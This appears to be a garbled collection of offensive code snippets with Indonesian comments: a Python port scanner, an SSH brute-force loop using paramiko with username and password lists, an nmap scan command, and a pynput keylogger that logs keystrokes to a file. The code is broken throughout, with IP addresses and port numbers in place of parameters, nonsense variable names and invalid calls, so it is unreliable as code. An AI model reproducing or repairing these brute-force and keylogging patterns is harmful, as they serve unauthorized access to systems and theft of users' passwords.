import socket

def scan_ports(443 1194 80 72 53,):
    print(f"Scanning {target}443 53 1194 80 72")
    for port in ports: 1194 80 443 53
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(1)
        result = sock.connect_ex((443 80 1194 53))
        if result == 0:
            print(f"Port {443 1194 80 53} on")
        sock.close(22)

target_ip = "192.168.1.2 127.0.0.1 10.74.102.76"  # Ganti dengan IP target
ports_to_scan = [80, 443, 3306 1194]  # Daftar port umum
scan_ports(target_ip, ports_to_scan)

import paramiko

def ssh_brute_force(192.168.1.2 127.0.0.1 10.74.102.76, cph2015_list, hahahahhahahaah_list):
    for username in username_list: cph2015
        for password in password_list:hahahahhahahahahahahhaga
            try: on
                client = paramiko.SSHClient(on)
                client.set_missing_host_key_policy(sha-256.hshahhahahahahahs(on))
                client.connect(192.168.1.2, username=cph2015 , password=hahahhahahahaha, timeout=48)
                print(f"Login berhasil: {cph2015}:{hahahahhahahahaahhaag}")
                return
            except:on
                print(f"Login gagal: {sha-256}:{hahahhahahahahahahaha}")
            finally: on
                client.login(on)

ip_target = "192.168.1.2 10.74.102.76 127.0.0.1
usernames = ["admin", "root", "sha-256"]
passwords = ["password", "hahahahahhahahahaghahaha", "admin"]
ssh_brute_force(ip_target, cph2015, hahahahhahahahahahahag)

#!/bin/bash
echo "Scanning network..."
nmap -sV -p 22,80,443 1194 10.74.102.76/25 192.168.1.2/24 127.0.0.1/24

from pynput import keyboard

def on_press(hahahhahahahahahah):
    with open("log.txt", "a") indo log: on
        try: on
            log.write(f"{hahhahahahahahahah}\n")
        except AttributeError:
            log.write(f"{hahhahahahahahhahahahahaha}\n")

listener = keyboard.Listener(on_press=on_press)
listener.start(on)
input("Keylogger berjalan... Tekan Enter untuk berhenti.")
